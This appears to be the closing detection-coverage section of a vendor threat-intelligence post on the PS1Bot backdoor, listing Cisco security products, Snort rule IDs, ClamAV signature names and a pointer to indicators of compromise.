Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort SIDs for the threats are:
Snort2: 65231 – 65233
Snort3: 65231 – 65233
ClamAV detections are also available for this threat:
Win.Backdoor.PS1Bot-10056514-0
Win.Backdoor.PS1Bot-10056515-0
Win.Backdoor.PS1Bot-10056516-0
Win.Backdoor.PS1Bot-10056517-0
Win.Backdoor.PS1Bot-10056518-0
Win.Backdoor.PS1Bot-10056519-0
Win.Backdoor.PS1Bot-10056520-0
Win.Backdoor.PS1Bot-10056521-0
Win.Backdoor.PS1Bot-10056522-0
Win.Backdoor.PS1Bot-10056523-0
Win.Backdoor.PS1Bot-10056524-0
Win.Backdoor.PS1Bot-10056525-0
Win.Backdoor.PS1Bot-10056526-0
Win.Backdoor.PS1Bot-10056527-0
Win.Backdoor.PS1Bot-10056528-0
Win.Backdoor.PS1Bot-10056529-0
Win.Backdoor.PS1Bot-10056530-0
Win.Backdoor.PS1Bot-10056531-0
Win.Backdoor.PS1Bot-10056532-0
Win.Backdoor.PS1Bot-10056533-0
Win.Backdoor.PS1Bot-10056534-0
Win.Backdoor.PS1Bot-10056535-0
Win.Backdoor.PS1Bot-10056536-0
Win.Backdoor.PS1Bot-10056537-0
Win.Backdoor.PS1Bot-10056538-0
Win.Backdoor.PS1Bot-10056539-0
Win.Backdoor.PS1Bot-10056540-0
Win.Backdoor.PS1Bot-10056541-0
Win.Backdoor.PS1Bot-10056542-0
Indicators of compromise (IOCs)
IOCs for this threat can be found in our GitHub repository here.
